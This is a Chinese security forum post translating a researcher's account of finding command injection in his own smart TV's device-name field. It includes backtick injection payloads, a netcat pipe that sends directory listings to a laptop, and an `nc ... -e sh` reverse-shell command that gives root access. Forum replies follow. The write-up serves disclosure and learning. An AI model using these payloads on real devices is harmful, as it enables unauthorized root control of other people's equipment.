用户
搜索
    开心

连续签到: 1 天

管理员

Security Personnel

魔法币
    收听

幽默灌水王突出贡献春秋文阁春秋巡逻热心助人奖

zusheng 管理员 Security Personnel 幽默灌水王 突出贡献 春秋文阁 春秋巡逻 热心助人奖 楼主
    原文链接:https://www.netsparker.com/blog/ ... -command-injection/

0x01 前言
    看了一天的电视,我已经很累了,但是我一直在想我以前在我的路由器中发现的一个漏洞,发现这样设备中的漏洞是非常有趣的,因为你可以看见除了开发人员普通用户看不到的东西。

因为我非常累了,所以我只是想设置一下电视机上的睡眠定时器。但是在设置定时器的时候,我想知道电视机还有没有其他的功能菜单,只有开发人员才能使用的隐藏功能。我在手机上Google一下,发现这个品牌的电视机有一个打开隐藏菜单的代码。

打开设置并在遥控器上输入代码后,屏幕左侧弹出一个菜单,但是所有类别都是不可使用的状态,我只能激活Hotel Mode并查看一下版本号。

我想了解更多有关电视的信息。在设置中,有一个info的类别,我打开它,只看到一些更多的版本号。然后我发现我实际上可以给我的电视机取一个名字。

0x02 发现漏洞
    当你在信息安全工作时,你可能会在你每天遇到的输入字段中去测试一些Payload。在我的这种情况下,我认为将电视机重命名为
    `sleep 5`
    会非常有趣的。

重命名后,设置菜单冻结了很久,然后再次响应的时候,我更改了名字,这样我才可以选择其他菜单项。到这里,我还不知道我刚刚发现一个类似命令注入的东西,我很好奇现在为什么需要更长时间才能做出反应。

时间不符合我的输入,因为它超过了五秒钟。我认为这可能与我注入的字符有关,我再次尝试注入
    `sleep 0`

它立即被加载了。

我不知道接下来该干些什么,我准备测量时间,事实证明,它的响应时间总是输入数字的三倍:

• sleep(2) 6 seconds
    • sleep(3) 9 seconds
    • sleep(5) 15 seconds

0x03 在我的智能电视上执行命令
    我不敢相信,在我尝试的第一个输入字段中实际上有一个命令注入。冻结菜单并不是最终的证明,我只能输入31个字符,减去两个反引号,我的Payload只能由29个字符组成。

以下是我试图在电视上运行的命令列表,其中包括对它们的内容的解释,以及确认是否成功。

真的很晚了,所以我决定去睡觉,第二天尝试拿一个shell。现在最有趣的是我可以通过使用遥控器在电视上运行系统命令。

0x04 在智能电视上获取Shell
    我的电视是壁挂式的,所以插入电缆并不像大家想像的那么容易。经过一番折腾,我插上电缆。我把它连接到笔记本电脑,并使用ipconfig来查看IP。

现在,我知道了我笔记本电脑的IP地址,我不需要知道电视机的IP地址,我只需要反弹一个shell到我的笔记本电脑就好了。反弹shell很方便,使用它将绕过任何可能阻止传入连接的防火墙规则。但是我只能使用不到29个字符,所以我先准备收集一下信息。

在智能电视上使用Netcat

我发现电视机上安装了nc,所以我决定使用nc将某些命令的输出结果传到我的笔记本电脑,我尝试的第一个命令当然是id,这个命令可以告诉我,我在智能电视机上是否拥有root权限。

从上面可以看出我拥有root权限,这不奇怪,但是能看到还是很高兴啊。接下来我准备列一下根目录列表:
    `ls -la /|nc 169.254.56.216 5`

演示:

完美,但这并不是太有用。然而,由于安装在电视上的nc版本允许-e参数,所以我们很容易就可以获得一个反弹shell。
    `nc 169.254.213.210 5 -e sh`

演示:

0x05 Shell进行时
    完美,我们现在拥有一个shell,接下来,我特别有兴趣来玩一下电视机。如改变开机的过程,就是开机过程中的标志,或者改变应用程序的图标,由于这是一款智能电视,因此拥有一些预先安装的应用,如Youtube和Skype。

我注意到大部分文件系统是只读的,所以我不能改变标志。但是有一些频繁变化的图片,即频道预览框,您可以在不同的电视频道之间切换时看到。它们包含您访问频道时运行的程序的快照。显然,这些必须被保存在一个可以读写文件的地方。

我注意到图标图像是.png文件。我使用命令find / -name *.png列出了带有.png扩展名的所有文件,但预览文件不在那里。接下来我尝试了相同的搜索,但这次是.jpg文件,我注意到一些文件,如channelImage123.jpg。 上传我想显示的文件,并替换相应的channelImage文件,结果如下:

0x06 总结
    互联网连接的设备很可能会在最奇怪的地方存在漏洞,当我测试了睡眠命令时,我甚至没有想到它会工作,所以我只是因为无聊而已。我也不知道我的电视是在linux上运行,甚至惊讶地发现我的漏洞是可以利用的。

这个漏洞是不可远程利用的,但是我没有把我的电视连接到互联网,并使用它的智能功能。我觉得有人可以控制我的电视,我认为它可能还会有更酷的漏洞,我要等待看看它是否被破坏了,因为你看电视毕竟是为了放松。不要提高你的血压,除非你喜欢看足球。
    Hacking the earth
    沙发
    使用道具 举报 回复
    很强6666
    使用道具 举报 回复
    提莫队长正在待命
    使用道具 举报 回复
    前排围观一下
    使用道具 举报 回复
    脑洞真大 厉害厉害 学习了
    使用道具 举报 回复
    这就是思路66666
    使用道具 举报 回复
    脑洞真大
    使用道具 举报 回复
    你门家,这是什么电视
    The quieter you become,the more you are able to hear......
    使用道具 举报 回复
    这脑洞 可以  
    使用道具 举报 回复